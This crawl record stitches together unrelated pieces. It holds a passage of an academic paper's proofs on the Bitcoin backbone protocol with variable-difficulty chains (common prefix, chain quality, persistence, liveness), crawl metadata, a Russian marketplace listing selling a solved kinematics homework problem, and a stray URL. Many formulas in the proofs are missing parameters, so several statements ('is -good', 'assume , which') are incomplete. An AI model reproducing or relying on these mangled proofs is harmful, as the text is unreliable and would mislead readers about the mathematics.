{C}$$ is -good in $$E_r$$.\n\n### Proof\n\nNote that it is our assumption that every chain is -good at the first round. Therefore, to prove the statement, it suffices to show that if a chain is -good at a recalculation point $$r^*$$, then it will also be -good at then next recalculation point $$r^*+\\varDelta$$.\n\nLet $$r^*$$ and $$r^*+\\varDelta \\le r$$ be two consecutive target-calculation points of a chain $$\\mathcal {C}$$ and T the target of the corresponding epoch. By Lemma 3 and Definition 2 of the target-recalculation function, the new target will be\n\\begin{aligned} T'=\\frac{\\varDelta }{m/f}\\cdot T, \\end{aligned}\nwhere $$\\varDelta$$ is the duration of the epoch.\nWe wish to show that\n\\begin{aligned} \\eta \\gamma f\\le f(T',n_{r^*+\\varDelta })\\le {\\theta f}/\\gamma . \\end{aligned}\nTo this end, let $$S=\\{r^*,\\dots ,r^*+\\varDelta \\}$$, $$S'=\\bigl \\{\\max \\{0,r^*-\\frac{m}{16\\tau f}\\},\\dots ,\\min \\{r^*+\\varDelta +\\frac{m}{16\\tau f},r\\}\\bigr \\}$$, and let J index the queries available to the adversary in $$S'$$. Note that, by Corollary 1, every block in the epoch was computed either by an honest party during a round in S or by the adversary during a round in $$S'$$.\nSuppose—towards a contradiction—that $$f(T',n_{r^*+\\varDelta })<\\eta \\gamma f$$. Using the definition of f(Tn), this implies $${qn_{r^*+\\varDelta }}\\ln \\bigl (1-\\frac{T'}{2^\\kappa }\\bigr )>\\ln (1-\\eta \\gamma f).$$ Applying the inequality $$-\\frac{x}{1-x}<\\ln (1-x)<-x$$, valid for $$x\\in (0,1)$$, substituting the expression for $$T'$$ above and rearranging, we obtain\n\\begin{aligned} \\frac{m}{T}>\\frac{1-\\eta \\gamma f}{\\eta \\gamma }\\cdot p\\varDelta n_{r^*+\\varDelta }. \\end{aligned}\nBy Propositions 3 and 5 it follows that\n$$\\frac{m}{T} \\le 2(1+\\epsilon )p\\sum _{r\\in S'}n_r \\le 2(1+\\epsilon )p\\cdot \\frac{\\varDelta +\\frac{m}{8\\tau f}}{|S'|}\\cdot \\sum _{r\\in S'}n_r.$$\nBy Lemma 3, $$\\varDelta \\ge \\frac{m}{\\tau f}$$. Thus, $$\\frac{\\varDelta +\\frac{m}{8\\tau f}}{\\varDelta }\\le \\frac{9}{8}$$. Using this, Requirement (R5), and combining the inequalities on $$\\frac{m}{T}$$,\n$$\\gamma n_{r^*+\\varDelta } <\\frac{9(1+\\epsilon )\\eta \\gamma ^2}{4(1-\\eta \\gamma f)}\\cdot \\frac{1}{|S'|}\\sum _{r\\in S'}n_r \\le \\frac{1}{|S'|}\\sum _{r\\in S'}n_r,$$\nFor the upper bound, assume , which (see Proposition 1) implies\n\\begin{aligned} \\frac{m}{T}<\\frac{\\gamma }{\\theta }\\cdot p\\varDelta n_{r^*+\\varDelta }. \\end{aligned}\nSet $$S=\\{r^*+\\frac{m}{16\\tau f},\\dots ,r^*+\\varDelta -\\frac{m}{16\\tau f}\\}$$. Since an honest party posses $$\\mathcal {C}$$ at round r, it follows by Lemma 2 that there is a block computed by an honest party in $$\\mathcal {C}$$ during $$\\{r^*,\\dots ,r^*+\\frac{m}{16\\tau f}-1\\}$$ and one during $$\\{r^*+\\varDelta -\\frac{m}{16\\tau f}+1,\\dots ,r^*+\\varDelta \\}$$. By the Chain-Growth Lemma 1, it follows that the honest parties computed less than $$\\frac{m}{T}$$ difficulty during S. In particular,\n$$\\frac{m}{T} >(1-\\epsilon )(1-\\theta f)p\\sum _{r\\in S}n_r \\ge (1-\\epsilon )(1-\\theta f)p\\cdot \\frac{\\varDelta -\\frac{m}{8\\tau f}}{|S|}\\cdot \\sum _{r\\in S}n_r .$$\nBy Lemma 3, $$\\varDelta \\ge \\frac{m}{\\tau f}$$. Thus, $$\\frac{\\varDelta -\\frac{m}{8\\tau f}}{\\varDelta }\\ge \\frac{7}{8}$$. Using this, Requirement (R6), and combining the inequalities on $$\\frac{m}{T}$$,\n$$\\frac{n_{r^*+\\varDelta }}{\\gamma }>\\frac{7\\theta }{8\\gamma ^2}(1-\\epsilon )(1-\\theta f)\\cdot \\frac{1}{|S|}\\sum _{r\\in S}n_r \\ge \\frac{1}{|S|}\\sum _{r\\in S}n_r ,$$\ncontradicting Fact 1.   $$\\square$$\n\n### Corollary 2\n\nLet E be a typical execution in a $$(\\gamma ,s)$$-respecting environment and $$E_{r-1}$$ be $$(\\eta ,\\theta )$$-good. If every chain in $$\\mathcal {S}_{r-1}$$ is $$(\\eta \\gamma ,\\smash {\\frac{\\theta }{\\gamma }})$$-good, then $$E_r$$ is $$(\\eta ,\\theta )$$-good.\n\n### Proof\n\nWe use notations and definitions of Lemma 3. Let $$\\mathcal {C}\\mathcal {S}_r$$ and let $$r^*$$ be its last recalculation point in $$E_{r-1}$$. Let T be the target after $$r^*$$ and $$T'$$ the one at r. We need to show that $$f(T',n_r)\\in [\\eta f,\\theta f]$$. Note that if r is a recalculation point, this follows by Lemma 4. Otherwise, $$T'=T$$ and $$\\eta \\gamma \\le f(T,n_{r^*})\\le \\theta f/\\gamma$$. Using Lemma 3, $$r-r^*\\le \\varDelta \\le \\frac{\\tau m}{f}$$. Thus, $$\\frac{1}{\\gamma }n_{r^*}\\le n_r\\le \\gamma n_{r^*}$$. By Fact 2 we have $$f(T,n_r)\\le f(T,\\gamma n_{r^*})\\le \\gamma f(T,n_{r^*})\\le \\theta f$$ and $$f(T,n_r)\\ge f(T,{\\textstyle \\frac{1}{\\gamma }}n_{r^*})\\ge {\\textstyle \\frac{1}{\\gamma }}f(T,n_{r^*})\\ge \\eta f.$$    $$\\square$$\n\n### Corollary 3\n\nLet E be a typical execution in a $$(\\gamma ,s)$$-respecting environment. Then every round is $$(\\eta ,\\theta )$$-good in E.\n\n### Proof\n\nFor the sake of contradiction, let r be the smallest round of E that is not $$(\\eta ,\\theta )$$-good. This means that there is a chain $$\\mathcal {C}$$ and an honest party that possesses this chain in round r and the corresponding target T is such that $$f(T,n_r) \\not \\in [\\eta f, \\theta f]$$. Note that $$E_{r-1}$$ is $$(\\eta ,\\theta )$$-good, and so, by Corollary 1, $$E_{r}$$ is $$\\frac{m}{16\\tau f}$$-accurate. Let $$r^*<r$$ be the last -good recalculation point of $$\\mathcal {C}$$ (let $$r^*$$ be 0 in case there is no such point).\n\nFirst suppose that there is another recalculation point $$r'\\in (r^*,r]$$. By the definition of $$r^*$$, $$r'$$ is not -good. However, the assumptions of Lemma 4 hold, implying that $$\\mathcal {C}$$ is -good. We have reached a contradiction.\n\nWe may now assume that there is no recalculation point in $$(r^*,r]$$ and so the points $$r^*$$ and r correspond to the same target T with $$\\eta \\gamma \\le f(T,n_{r^*})\\le \\theta f/\\gamma$$. Note that since $$r^*$$ is an -good recalculation point and $$E_{r-1}$$ is $$(\\eta ,\\theta )$$-good, we have $$r-r^*\\le \\frac{\\tau m}{f}$$. This follows from Lemma 3, because $$\\mathcal {C}$$ belongs to an honest party at round r. Thus, $$\\frac{1}{\\gamma }n_{r^*}\\le n_r\\le \\gamma n_{r^*}$$, and so (by Fact 2) $$f(T,n_r)\\le f(T,\\gamma n_{r^*})\\le \\gamma f(T,n_{r^*})\\le \\theta f$$ and $$f(T,n_r)\\ge f(T,{\\textstyle \\frac{1}{\\gamma }}n_{r^*})\\ge {\\textstyle \\frac{1}{\\gamma }}f(T,n_{r^*})\\ge \\eta f.$$    $$\\square$$\n\n### Theorem 1\n\nA typical execution in a $$(\\gamma ,s)$$-respecting environment is $$\\frac{m}{16\\tau f}$$-accurate and $$(\\eta ,\\theta )$$-good.\n\n### Proof\n\nThis follows from Corollaries 3 and 1.    $$\\square$$\n\n### Proposition 6\n\nLet E be a typical execution in a $$(\\gamma ,s)$$-respecting environment. Any $$\\frac{\\theta \\gamma m}{8\\tau }$$ consecutive blocks in an epoch of a chain $$\\mathcal {C}\\in \\mathcal {S}_r$$ have been computed in at least $$\\frac{m}{16\\tau f}$$ rounds.\n\n### Proof\n\nSuppose—towards a contradiction—that the blocks of $$\\mathcal {C}$$ where computed during the rounds in $$S^*$$, for some $$S^*$$ such that $$|S^*|<\\frac{m}{16\\tau f}$$. Consider an S such that $$S^*\\subseteq S$$ and $$|S|=\\frac{m}{16\\tau f}$$ and the property that a block of target T in $$\\mathcal {C}$$ was computed by an honest party in some round $$v\\in S$$. Such an S exists by Lemmas 2 and 3. By Propositions 3 and 5, the number of blocks of target T computed in S is at most\n$$(1+\\epsilon )(2-\\delta )pT\\sum _{u\\in S}n_u \\le (1+\\epsilon )(2-\\delta )pT\\gamma n_v|S| \\le \\frac{(1+\\epsilon )(2-\\delta )\\gamma |S|\\theta f}{1-\\theta f} \\le \\frac{\\theta \\gamma m}{8\\tau } .$$\nFor the first inequality we used Fact 1, for the second Fact 1 and that round v is $$(\\eta ,\\theta )$$-good, and for the last one Requirement (R2).    $$\\square$$\n\nLet us say that two chains $$\\mathcal {C}$$ and $$\\mathcal {C}'$$ diverge before round r, if the timestamp of the last block on their common prefix is less than r.\n\n### Lemma 5\n\nLet E be a typical execution in a $$(\\gamma ,s)$$-respecting environment. Any $$\\mathcal {C},\\mathcal {C}'\\in \\mathcal {S}_r$$ do not diverge before round $$r-\\frac{m}{16\\tau f}$$.\n\n### Proof\n\nConsider the last block on the common prefix of $$\\mathcal {C}$$ and $$\\mathcal {C}'$$ that was computed by an honest party and let $$r^*$$ be the round on which it was computed (set $$r^*=0$$ if no such block exists). Denote by $$\\mathcal {C}^*$$ the common part of $$\\mathcal {C}$$ and $$\\mathcal {C}'$$ up to (and including) this block and let $$d^*=\\mathrm {diff}(\\mathcal {C}^*)$$ and $$S=\\{i:r^*<u<r\\}$$. We claim that\n\\begin{aligned} (1+\\epsilon )(1-\\delta )p\\sum _{u\\in S}n_u\\ge \\sum _{u\\in S}Q_u. \\end{aligned}\n(2)\nIn view of Proposition 5, it suffices to show that the difficulty which the adversary contributed to $$\\mathcal {C}$$ and $$\\mathcal {C}'$$ is at least the right-hand side of (2). The proof of this rests on the following observation.\n\nConsider any block B extending a chain $$\\mathcal {C}_1$$ that was computed by an honest party in a uniquely successful round $$u\\in S$$. Consider also an arbitrary $$d\\in \\mathbb {R}$$ such that $$\\mathrm {diff}(\\mathcal {C}_1)\\le d<\\mathrm {diff}(\\mathcal {C}_1B)$$. We are going to argue that if another chain of difficulty at least d exists, then the block that “contains” the point of difficulty d was computed by the adversary. More formally, suppose a chain $$\\mathcal {C}_2B'$$ exists such that $$B'\\ne B$$ and $$\\mathrm {diff}(\\mathcal {C}_2)\\le d<\\mathrm {diff}(\\mathcal {C}_2B')$$. We observe that $$B'$$ was computed by the adversary. This is because no honest party would extend $$\\mathcal {C}_2$$ at a round later than u since $$\\mathrm {diff}(\\mathcal {C}_2)\\le d<\\mathrm {diff}(\\mathcal {C}_1B)$$; on the other hand, if an honest party computed $$B'$$ at some round $$u'<u$$, then no honest party would have extended $$\\mathcal {C}_1$$ at round u since $$\\mathrm {diff}(\\mathcal {C}_1)\\le d<\\mathrm {diff}(\\mathcal {C}_2B')$$; finally, note that u is also ruled out since it was a uniquely successful round by assumption.\n\nReturning to the proof of (2) note that, by the Chain-Growth Lemma 1, $$\\mathrm {diff}(\\mathcal {C}')$$ and $$\\mathrm {diff}(\\mathcal {C})$$ are at least $$d^*+\\sum _{u\\in S}Q_u$$. To show (2) it suffices to argue that for all $$d\\in (d^*,\\sum _{u\\in S}Q_u]$$ there is always a $$B'$$ as above that lies either on $$\\mathcal {C}$$, or on $$\\mathcal {C}'$$, or on their common prefix. But this is always possible since B cannot be both on $$\\mathcal {C}$$ and $$\\mathcal {C}'$$ (note that by the definition of $$r^*$$, B cannot be on their common prefix). To finish the proof note that (2) contradicts Proposition 3 for large enough S.    $$\\square$$\n\n### Theorem 2\n\n(Common Prefix). Let E be a typical execution in a $$(\\gamma ,s)$$-respecting environment. For any round r and any two chains in $$\\mathcal {S}_r$$, the common-prefix property holds for $$k\\ge \\frac{\\theta \\gamma m}{4\\tau }$$.\n\n### Proof\n\nSuppose common prefix fails for two chains $$\\mathcal {C}$$ and $$\\mathcal {C}'$$ at round r. At least k / 2 of the blocks in each chain after their common prefix, lie in a single epoch. Proposition 6 implies that $$\\mathcal {C}$$ and $$\\mathcal {C}'$$ diverge before round $$r-\\frac{m}{16\\tau f}$$, contradicting Lemma 5.    $$\\square$$\n\n### Theorem 3\n\n(Chain Quality). Suppose E is a typical execution in a $$(\\gamma ,s)$$-respecting environment. For the chain of any honest party at any round in E, the chain-quality property holds with parameters $$\\ell =\\frac{m}{16\\tau f}$$ and , where $$\\lambda =\\max \\{t_r/n_r\\}<(1-\\delta )$$.\n\n### Proof\n\nLet us denote by $$B_i$$ the i-th block of $$\\mathcal {C}$$ so that $$\\mathcal {C}=B_1 \\dots B_{\\mathop {\\mathrm {len}}(\\mathcal {C})}$$ and consider L consecutive blocks $$B_u,\\dots ,B_v$$. Define $$L'$$ as the least number of consecutive blocks $$B_{u'},\\dots ,B_{v'}$$ that include the L given ones (i.e., $$u'\\le u$$ and $$v\\le v'$$) and have the properties (1) that the block $$B_{u'}$$ was computed by an honest party or is $$B_1$$ in case such block does not exist, and (2) that there exists a round at which an honest party was trying to extend the chain ending at block $$B_{v'}$$. Observe that number $$L'$$ is well defined since $$B_{\\mathop {\\mathrm {len}}(\\mathcal {C})}$$ is at the head of a chain that an honest party is trying to extend. Denote by $$d'$$ the total difficulty of these $$L'$$ blocks. Define also $$r_1$$ as the round that $$B_{u'}$$ was created (set $$r_1=0$$ if $$B_{u'}$$ is the genesis block), $$r_2$$ as the first round that an honest party attempts to extend $$B_{v'}$$, and let $$S=\\{r:r_1\\le r\\le r_2\\}$$. Note that $$|S|\\ge \\frac{m}{16\\tau f}$$.\n\nNow let x denote the total difficulty of all the blocks from honest parties that are included in the L blocks and—towards a contradiction—assume that\n\\begin{aligned} x<\\Bigl [1-\\Bigl (1+\\frac{\\delta }{2}\\Bigr )\\lambda \\Bigr ]d \\le \\Bigl [1-\\Bigl (1+\\frac{\\delta }{2}\\Bigr )\\lambda \\Bigr ]d' .\\end{aligned}\n(3)\nSuppose first that all the $$L'$$ blocks $$\\{B_j:u'\\le j\\le v'\\}$$ have been computed during the rounds in the set S. Recalling Proposition 5, we now argue the following sequence of inequalities.\n\\begin{aligned} (1+\\epsilon )(1-\\delta )p\\sum _{u\\in S}n_u\\ge d'-x \\ge \\Bigl (1+\\frac{\\delta }{2}\\Bigr )\\lambda d' \\ge \\Bigl (1+\\frac{\\delta }{2}\\Bigr )\\lambda \\sum _{u\\in S}Q_u .\\end{aligned}\n(4)\nThe first inequality follows from the definition of x and $$d'$$ and Proposition 5. The second one comes from the relation between x and $$d'$$ outlined in (3). To see the last inequality, assume $$\\sum _{u\\in S}Q_u>d'$$. But then, by the Chain-Growth Lemma 1, the assumption than an honest party is on $$B_{v'}$$ at round $$r_2$$ is contradicted as all honest parties should be at chains of greater length. We now observe that (4) contradicts Proposition 3, since\n$$\\Bigl (1+\\frac{\\delta }{2}\\Bigr )\\lambda \\sum _{u\\in S}Q_u >(1-\\epsilon )(1-\\theta f)\\Bigl (1-\\frac{\\delta }{2}\\Bigr )p\\sum _{u\\in S}n_u \\ge (1+\\epsilon )(1-\\delta )p\\sum _{u\\in S}n_u ,$$\nwhere the middle inequality follows by Requirement (R2).\n\nTo finish the proof we need to consider the case in which these $$L'$$ blocks contain blocks that the adversary computed in rounds outside S. It is not hard to see that this case implies either a prediction or an insertion and cannot occur in a typical execution.    $$\\square$$\n\n### Theorem 4\n\nLet E be a typical execution in a $$(\\gamma ,s)$$-respecting environment. Persistence is satisfied with depth $$k\\ge \\frac{\\theta \\gamma m}{4\\tau }$$.\n\n### Proof\n\nSuppose an honest party P has at round r a chain $$\\mathcal {C}$$ such that $$\\mathcal {C}^{\\lceil k}$$ contains a transaction $$\\mathrm {tx}$$.\n\nWe first show that the $$k\\ge \\smash {\\frac{\\theta \\gamma m}{4\\tau }}$$ blocks of $$\\mathcal {C}$$ cannot have been computed in less than $$\\smash {\\frac{m}{16\\tau f}}$$ rounds. Suppose—towards a contradiction—that this was the case. By Lemma 3, at least $$\\smash {\\frac{\\theta \\gamma m}{8\\tau }}$$ of the k blocks belong to a single epoch and Proposition 6 is contradicted.\n\nTo show persistence, note that if any party $$P'\\ne P$$ has a chain $$\\mathcal {C}'$$ at round r and $$\\mathcal {C}^{\\lceil k}$$ is not a prefix of $$\\mathcal {C}'$$, then Lemma 5 is contradicted. Next, let $$r'>r$$ be the first round after r such that an honest party $$P'$$ has a chain $$\\mathcal {C}'$$ such that $${\\mathcal {C}^{\\lceil k}}$$ is not a prefix of $$\\mathcal {C}'$$. By the note above and the minimality of $$r'$$ it follows that no honest party had a prefix of $$\\mathcal {C}'$$ at round $$r'-1$$. Thus, $$\\mathcal {C}'$$ existed at round $$r'-1$$ and $$P'$$ had another chain $$\\mathcal {C}''$$ at that round such that $$\\mathcal {C}^{\\lceil k}\\preceq \\mathcal {C}''$$ and $$\\mathrm {diff}(\\mathcal {C}'')<\\mathrm {diff}(\\mathcal {C}')$$. We now observe that $$\\mathcal {C}'$$ and $$\\mathcal {C}''$$ contradict Lemma 5 at round $$r'-1$$.    $$\\square$$\n\n### Theorem 5\n\nLet E be a typical execution in a $$(\\gamma ,s)$$-respecting environment. Liveness is satisfied for depth k with wait-time $$\\frac{m}{16\\tau f}+\\frac{\\gamma k}{\\eta f(1-\\epsilon )(1-\\theta f)}$$.\n\n### Proof\n\nSuppose a transaction $$\\mathrm {tx}$$ is included in any block computed by an honest party for $$\\smash {\\frac{m}{16\\tau f}}$$ consecutive rounds and let S denote the set of $$\\smash {\\frac{\\gamma k}{\\eta f(1-\\epsilon )(1-\\theta f)}}$$ rounds that follow these rounds. Consider now the chain $$\\mathcal {C}$$ of an arbitrary honest party after the rounds in S. By Lemma 2, $$\\mathcal {C}$$ contains an honest block computed in the $$\\frac{m}{16\\tau f}$$ rounds. This block contains $$\\mathrm {tx}$$. Furthermore, after the rounds in the set S, on top of this block there has been accumulated at least $$\\sum _{r\\in S}Q_r$$ amount of difficulty. We claim that this much difficulty corresponds to at least k blocks. To show this, assume $$|S|\\le s$$ (or consider only the first s rounds of S). Let T be the smallest target computed by an honest party during the rounds in S and let u be such a round. It suffices to show $$T\\sum _{r\\in S}Q_r\\ge k$$. Indeed,\n$$T\\sum _{r\\in S}Q_r \\ge (1-\\epsilon )(1-\\theta f)pT\\sum _{r\\in S}n_r \\ge (1-\\epsilon )(1-\\theta f)\\frac{pTn_u|S|}{\\gamma }\\ge k .$$\nThe first inequality follows from Proposition 3, the second by Fact 1, and for the last one we substitute the size of S and use that $$pTn_u\\ge f(T,n_u)\\ge \\eta f$$ (since u is $$(\\eta ,\\theta )$$-good).    $$\\square$$\n\n## Footnotes\n\n1. 1.\n\nIn Bitcoin, solving a proof of work essentially amounts to brute-forcing a hash inequality based on SHA-256.\n\n2. 2.\n\nIn Bitcoin, m is set to 2016 and roughly corresponds to 2 weeks in real time—assuming the number of parties does not change much.\n\n3. 3.\n\nIn the latest version of , we show that in the case of fixed difficulty, the analysis of the Bitcoin backbone in the synchronous model extends with relative ease to partial synchrony. We leave the extension of the variable-difficulty case for future work.\n\n4. 4.\n\nIn this is referred to as the “flat-model” in terms of computational power, where all parties are assumed equal. In practice, different parties may have different “hashing power”; note that this does not sacrifice generality since one can imagine that real parties are simply clusters of some arbitrary number of flat-model parties.\n\n5. 5.\n\nNote that in order to calculate f, we can consider that a round of full interaction lasts 18 s; If this is combined with the fact that the target is set for a POW to be discovered approximately every 10 min, we have that 18/600 = 0.3 is a good estimate for f.\n\n## References\n\n1. 1.\nBack, A.: Hashcash (1997). http://www.cypherspace.org/hashcash\n2. 2.\nBahack, L.: Theoretical bitcoin attacks with less than half of the computational power (draft). IACR Cryptology ePrint Archive 2013, 868 (2013). http://eprint.iacr.org/2013/868\n3. 3.\nBellare, M., Rogaway, P.: Random oracles are practical: a paradigm for designing efficient protocols. In: Denning, D.E., Pyle, R., Ganesan, R., Sandhu, R.S., Ashby, V. (eds.) Proceedings of the 1st ACM Conference on Computer and Communications Security, CCS 1993, Fairfax, Virginia, USA, 3–5 November 1993, pp. 62–73. ACM (1993). http://doi.acm.org/10.1145/168588.168596\n4. 4.\nCanetti, R.: Security and composition of multiparty cryptographic protocols. J. Cryptol. 13(1), 143–202 (2000)\n5. 5.\nCanetti, R.: Universally composable security: a new paradigm for cryptographic protocols. Cryptology ePrint Archive, Report 2000/067 (2000). http://eprint.iacr.org/2000/067\n6. 6.\nCanetti, R.: Universally composable security: a new paradigm for cryptographic protocols. In: 42nd Annual Symposium on Foundations of Computer Science, FOCS 2001, 14–17 October 2001, Las Vegas, Nevada, USA, pp. 136–145. IEEE Computer Society (2001). http://dx.doi.org/10.1109/SFCS.2001.959888\n7. 7.\nDwork, C., Lynch, N.A., Stockmeyer, L.J.: Consensus in the presence of partial synchrony. J. ACM 35(2), 288–323 (1988). http://doi.acm.org/10.1145/42282.42283\n8. 8.\nDwork, C., Naor, M.: Pricing via processing or combatting junk mail. In: Brickell, E.F. (ed.) CRYPTO 1992. LNCS, vol. 740, pp. 139–147. Springer, Heidelberg (1993). doi:\n9. 9.\nEyal, I., Sirer, E.G.: Majority is not enough: bitcoin mining is vulnerable. In: Christin, N., Safavi-Naini, R. (eds.) FC 2014. LNCS, vol. 8437, pp. 436–454. Springer, Heidelberg (2014). doi: Google Scholar\n10. 10.\nGaray, J.A., Kiayias, A., Leonardos, N.: The bitcoin backbone protocol: analysis and applications. IACR Cryptology ePrint Archive 2014, 765 (2014). http://eprint.iacr.org/2014/765\n11. 11.\nGaray, J., Kiayias, A., Leonardos, N.: The bitcoin backbone protocol: analysis and applications. In: Oswald, E., Fischlin, M. (eds.) EUROCRYPT 2015. LNCS, vol. 9057, pp. 281–310. Springer, Heidelberg (2015). doi: Google Scholar\n12. 12.\nGaray, J.A., Kiayias, A., Leonardos, N.: The bitcoin backbone protocol with chains of variable difficulty. IACR Cryptology ePrint Archive 2016, 1048 (2016). http://eprint.iacr.org/2016/1048\n13. 13.\nHadzilacos, V., Toueg, S.: A modular approach to fault-tolerant broadcasts and related problems. Technical report (1994)Google Scholar\n14. 14.\nJuels, A., Brainard, J.G.: Client puzzles: a cryptographic countermeasure against connection depletion attacks. In: NDSS, The Internet Society (1999)Google Scholar\n15. 15.\nKiayias, A., Koutsoupias, E., Kyropoulou, M., Tselekounis, Y.: Blockchain mining games. In: Conitzer, V., Bergemann, D., Chen, Y. (eds.) Proceedings of the 2016 ACM Conference on Economics and Computation, EC 2016, Maastricht, The Netherlands, 24–28 July 2016, pp. 365–382. ACM (2016). http://doi.acm.org/10.1145/2940716.2940773\n16. 16.\nKiayias, A., Panagiotakos, G.: Speed-security tradeoffs in blockchain protocols. IACR Cryptology ePrint Archive 2015, 1019 (2015). http://eprint.iacr.org/2015/1019\n17. 17.\nLamport, L., Shostak, R.E., Pease, M.C.: The byzantine generals problem. ACM Trans. Program. Lang. Syst. 4(3), 382–401 (1982)\n18. 18.\nMcDiarmid, C.: Concentration. In: Habib, M., McDiarmid, C., Ramirez-Alfonsin, J., Reed, B. (eds.) Probabilistic Methods for Algorithmic Discrete Mathematics. Algorithms and Combinatorics, vol. 16, pp. 195–248. Springer, Heidelberg (1998). doi:\n19. 19.\nMitzenmacher, M., Upfal, E.: Probability and Computing - Randomized Algorithms and Probabilistic Analysis. Cambridge University Press, Cambridge (2005)\n20. 20.\nNakamoto, S.: Bitcoin open source implementation of P2P currency. http://p2pfoundation.ning.com/forum/topics/bitcoin-open-source\n21. 21.\nPass, R., Seeman, L., Shelat, A.: Analysis of the blockchain protocol in asynchronous networks. In: Coron, J.-S., Nielsen, J.B. (eds.) EUROCRYPT 2017. LNCS, vol. 10211, pp. 643–673. Springer, Cham (2017). doi:\n22. 22.\nPease, M.C., Shostak, R.E., Lamport, L.: Reaching agreement in the presence of faults. J. ACM 27(2), 228–234 (1980)\n23. 23.\nRivest, R.L., Shamir, A., Wagner, D.A.: Time-lock puzzles and timed-release crypto. Technical report, Cambridge, MA, USA (1996)Google Scholar\n24. 24.\nSapirshtein, A., Sompolinsky, Y., Zohar, A.: Optimal selfish mining strategies in bitcoin. CoRR abs/1507.06183 (2015). http://arxiv.org/abs/1507.06183" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8842074,"math_prob":0.9994797,"size":76765,"snap":"2020-34-2020-40","text_gpt3_token_len":20546,"char_repetition_ratio":0.16806711,"word_repetition_ratio":0.10193527,"special_character_ratio":0.28347555,"punctuation_ratio":0.11577522,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99994934,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-26T12:59:42Z\",\"WARC-Record-ID\":\"<urn:uuid:6d815721-5ea2-4012-8aba-310384c53eb6>\",\"Content-Length\":\"272577\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cffe660b-4a78-47e3-a8e6-5be1fd1e58b0>\",\"WARC-Concurrent-To\":\"<urn:uuid:463e1c7e-e0b0-4aaf-8af9-8c9e3670b0ce>\",\"WARC-IP-Address\":\"199.232.64.95\",\"WARC-Target-URI\":\"https://link.springer.com/chapter/10.1007/978-3-319-63688-7_10\",\"WARC-Payload-Digest\":\"sha1:CBOUUSU7Q7TKZSBFHEQKMUKLME7EYLDL\",\"WARC-Block-Digest\":\"sha1:6PSYEEZ3YVDLPYRSOD3L65BLHFAJ2QFY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600400241093.64_warc_CC-MAIN-20200926102645-20200926132645-00596.warc.gz\"}"}
https://plati.market/itm/k1-option-83-figure-8-of-condition-3-targ-sm-1989/2368576
[ "# K1 Option 83 (Figure 8 of Condition 3) Targ SM. 1989\n\n• USD\n• RUB\n• USD\n• EUR\nAffiliates: 0,02 \\$how to earn\nSold: 0\nContent: K1_83_89.pdf 60,1 kB\nLoyalty discount! If the total amount of your purchases from the seller Timur_ed more than:\n 15 \\$ the discount is 20%", null, "## Seller", null, "Timur_ed information about the seller and his items\n\n## Product description\n\na) Point B moves in the xy plane; the trajectory of the point in the figures is shown conditionally. The law of motion of a point is given by the equations x = f1 (t), y = f2 (t), where x and y are expressed in centimeters, t-in seconds. Find the equation of the trajectory of the point; for the time t1 = 1c, determine the speed and acceleration of the point, as well as its tangential and normal acceleration and the radius of curvature at the corresponding point of the trajectory. b) The point moves along an arc of a circle of radius R = 2m according to the law S = f (t), S- in meters, t - in seconds. Determine the speed and acceleration of the point at time t1 = 1c.", null, "" ]
[ null, "https://plati.market/img/passport_ico_32.png", null, "https://plati.market/img/icon-merchant-0.png", null, "https://shop.digiseller.ru/asp/cntview.asp", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.72124636,"math_prob":0.994572,"size":2194,"snap":"2022-05-2022-21","text_gpt3_token_len":664,"char_repetition_ratio":0.09497717,"word_repetition_ratio":0.00982801,"special_character_ratio":0.3413856,"punctuation_ratio":0.07317073,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9895259,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-18T06:51:03Z\",\"WARC-Record-ID\":\"<urn:uuid:751bb6d0-8490-46f4-9dd5-66e5958c8de9>\",\"Content-Length\":\"59202\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:88d7c647-91a8-42e0-b7d4-19362c7ee22f>\",\"WARC-Concurrent-To\":\"<urn:uuid:610d53c5-6354-4ce5-8fcc-e48396332ca4>\",\"WARC-IP-Address\":\"185.26.97.103\",\"WARC-Target-URI\":\"https://plati.market/itm/k1-option-83-figure-8-of-condition-3-targ-sm-1989/2368576\",\"WARC-Payload-Digest\":\"sha1:YD5TQRTOV2QRLGL4OI7XZNLX3KZMV5VL\",\"WARC-Block-Digest\":\"sha1:5Y6F7EUH45UH4L5BDUTK2UTX3MHN6BS6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662521152.22_warc_CC-MAIN-20220518052503-20220518082503-00508.warc.gz\"}"}
http://www.51zjedu.com/yinianji/rjbsxx/27865.html
